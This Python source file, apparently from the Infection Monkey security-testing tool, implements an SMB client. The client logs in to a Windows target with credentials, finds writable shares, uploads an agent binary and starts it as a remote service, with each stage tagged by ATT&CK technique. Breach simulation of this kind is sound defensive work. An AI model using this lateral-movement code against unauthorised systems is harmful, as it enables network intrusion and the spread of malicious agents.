import logging
from pathlib import PurePath, PureWindowsPath
from typing import Callable, List, Set, Tuple, Type

from common import OperatingSystem
from common.agent_events import AgentEventTag
from common.credentials import Credentials
from common.tags import (
    BRUTE_FORCE_T1110_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    INGRESS_TOOL_TRANSFER_T1105_TAG,
    NETWORK_SHARE_DISCOVERY_T1135_TAG,
    REMOTE_SERVICES_T1021_TAG,
    SYSTEM_SERVICES_T1569_TAG,
)
from common.types import NetworkPort
from infection_monkey.exploit.tools import (
    IRemoteAccessClient,
    RemoteAuthenticationError,
    RemoteCommandExecutionError,
    RemoteFileCopyError,
)
from infection_monkey.i_puppet import TargetHost

from .smb_client import ShareInfo, SMBClient
from .smb_options import SMBOptions

logger = logging.getLogger(__name__)

# Service name handed to SMBClient.run_service when the agent is executed
SERVICE_NAME = "InfectionMonkey"

# Event tags that the client methods below add to the caller-supplied tag set, one set per stage
LOGIN_TAGS = {
    BRUTE_FORCE_T1110_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    REMOTE_SERVICES_T1021_TAG,
}
SHARE_DISCOVERY_TAGS = {NETWORK_SHARE_DISCOVERY_T1135_TAG}
COPY_FILE_TAGS = {INGRESS_TOOL_TRANSFER_T1105_TAG}
EXECUTION_TAGS = {
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    REMOTE_SERVICES_T1021_TAG,
    SYSTEM_SERVICES_T1569_TAG,
}

# Ports handed to SMBClient.run_service: 139 (SMB over NetBIOS) and 445 (SMB directly over TCP)
SMB_PORTS = [NetworkPort(port) for port in (139, 445)]


class SMBRemoteAccessClient(IRemoteAccessClient):
    """
    Manages the SMB connection used to log in to, upload files to, and run the agent on a target

    Each public operation adds its event tags to the caller-supplied ``tags`` set and translates
    low-level SMB failures into the corresponding Remote*Error exception.
    """

    def __init__(
        self,
        host: TargetHost,
        options: SMBOptions,
        command_builder: Callable[[PurePath], str],
        smb_client: SMBClient,
    ):
        """
        :param host: The target host to access
        :param options: SMB options; supplies the connect and agent upload timeouts
        :param command_builder: Builds the command line that runs the agent binary at a given path
        :param smb_client: The SMB client used to communicate with the target
        """
        self._host = host
        self._options = options
        self._command_builder = command_builder
        self._smb_client = smb_client

    def login(self, credentials: Credentials, tags: Set[AgentEventTag]):
        """
        Authenticate to the target over SMB

        :param credentials: The credentials to authenticate with
        :param tags: A set to which LOGIN_TAGS are added (before the attempt, so also on failure)
        :raises RemoteAuthenticationError: If authentication fails for any reason
        """
        tags.update(LOGIN_TAGS)

        try:
            self._smb_client.connect_with_user(
                self._host, credentials, timeout=self._options.smb_connect_timeout
            )
        except Exception as err:
            error_message = f"Failed to authenticate over SMB with {credentials}: {err}"
            raise RemoteAuthenticationError(error_message) from err

    def _raise_if_not_authenticated(self, error_type: Type[Exception]):
        """
        Guard for operations that require a successful login

        :param error_type: The exception type to raise if the SMB client is not connected
        :raises error_type: If the SMB client reports that it is not connected
        """
        if not self._smb_client.connected():
            raise error_type(
                "This operation cannot be performed until authentication is successful"
            )

    def get_os(self) -> OperatingSystem:
        """SMB targets handled by this client are always treated as Windows"""
        return OperatingSystem.WINDOWS

    def execute_agent(self, agent_binary_path: PurePath, tags: Set[AgentEventTag]):
        """
        Run the agent on the target by starting it as the SERVICE_NAME service

        :param agent_binary_path: Path of the agent binary on the target
        :param tags: A set to which EXECUTION_TAGS are added
        :raises RemoteCommandExecutionError: If not authenticated, or if building the command or
                                             running the service fails
        """
        self._raise_if_not_authenticated(RemoteCommandExecutionError)

        tags.update(EXECUTION_TAGS)
        try:
            self._smb_client.run_service(
                SERVICE_NAME,
                self._command_builder(agent_binary_path),
                self._host,
                SMB_PORTS,
                self._options.smb_connect_timeout,
            )
        except Exception as err:
            raise RemoteCommandExecutionError(err) from err

    def copy_file(self, file: bytes, destination_path: PurePath, tags: Set[AgentEventTag]):
        """
        Upload a file to the target through a share whose path contains the destination

        Candidate shares are tried in the order returned by _query_shares; the first successful
        upload ends the operation. Upload failures on individual shares are logged and the next
        share is tried.

        :param file: The contents of the file to upload
        :param destination_path: The full path on the target where the file should be written
        :param tags: A set to which SHARE_DISCOVERY_TAGS are added (and COPY_FILE_TAGS once an
                     upload is attempted)
        :raises RemoteFileCopyError: If not authenticated, if the shares cannot be queried, if no
                                     share contains destination_path, or if every upload fails
        """
        self._raise_if_not_authenticated(RemoteFileCopyError)

        logger.debug(
            f"Trying to copy monkey file to [{destination_path}] on victim {self._host.ip}"
        )

        tags.update(SHARE_DISCOVERY_TAGS)
        # Keep failures consistent with the rest of this client: callers expect a
        # RemoteFileCopyError, not whatever the underlying SMB/RPC layer raises.
        try:
            shares = self._query_shares()
        except Exception as err:
            raise RemoteFileCopyError(
                f"Failed to query shares on victim {self._host.ip}: {err}"
            ) from err

        destination_parents = destination_path.parents
        target_shares = [share for share in shares if share.path in destination_parents]
        if not target_shares:
            raise RemoteFileCopyError("No writable shares found")

        last_error = None
        for share in target_shares:
            # Path of the file relative to the share root, as expected by send_file()
            clean_destination = destination_path.relative_to(share.path)
            logger.debug(f"Clean destination: {clean_destination}")

            try:
                self._copy_file_to_share(file, share, clean_destination, tags)
                return
            except Exception as err:
                error_message = (
                    f"Error uploading monkey to share '{share.name}' "
                    f"on victim {self._host.ip}: {err}"
                )
                logger.error(error_message)
                last_error = err

        # Matching shares existed but every upload failed; report that (rather than claiming no
        # shares were found) and keep the last failure as the cause.
        raise RemoteFileCopyError(
            f"Failed to copy file to any writable share on victim {self._host.ip}"
        ) from last_error

    def _query_shares(self) -> Tuple[ShareInfo, ...]:
        """
        Return the target's shares that are candidates for uploading files

        A share is skipped if its current use count has reached its maximum, or if its path has
        no drive component. Whether the share is actually writable is not checked here.

        :return: The candidate shares, in the order reported by the SMB client
        """
        writable_shares = []

        for share in self._smb_client.query_shared_resources():
            skip_message = f"Skipping share '{share.name}' on victim {self._host.ip} because"
            if share.current_uses >= share.max_uses:
                logger.debug(f"{skip_message} maximum uses is exceeded")
                continue

            if not share.path.drive:
                logger.debug(f"{skip_message} the share path is invalid")
                continue

            writable_shares.append(share)

        return tuple(writable_shares)

    def _copy_file_to_share(
        self, file: bytes, share: ShareInfo, destination_path: PurePath, tags: Set[AgentEventTag]
    ):
        """
        Connect to a share and upload a file into it

        :param file: The contents of the file to upload
        :param share: The share to upload into
        :param destination_path: The destination path relative to the share root
        :param tags: A set to which COPY_FILE_TAGS are added once the share is connected
        :raises RemoteFileCopyError: If the share cannot be connected to
        :raises Exception: Whatever the SMB client raises if the upload itself fails
        """
        self._connect_to_share(share)
        # NOTE: the upload timeout is set on the client and is not restored afterwards
        self._smb_client.set_timeout(self._options.agent_binary_upload_timeout)

        tags.update(COPY_FILE_TAGS)
        # Paths inside an SMB share use Windows separators
        self._smb_client.send_file(share.name, PureWindowsPath(destination_path), file)

        logger.info(
            f"Copied monkey agent to remote share '{share.name}' "
            f"[{str(share.path)}] on victim {self._host.ip}"
        )

    def _connect_to_share(self, share: ShareInfo):
        """
        Connect the SMB client to a share

        :param share: The share to connect to
        :raises RemoteFileCopyError: If the share cannot be connected to
        """
        try:
            self._smb_client.connect_to_share(share.name)
        except Exception as err:
            logger.error(
                f'Error connecting tree to share "{str(share.path)}" '
                f"on victim {self._host.ip}: {err}"
            )
            raise RemoteFileCopyError(err) from err

    def get_writable_paths(self) -> List[PurePath]:
        """
        Return the paths of the target's candidate upload shares

        :return: The path of each share returned by _query_shares
        """
        logger.debug("Retrieving writable paths")
        return [info.path for info in self._query_shares()]
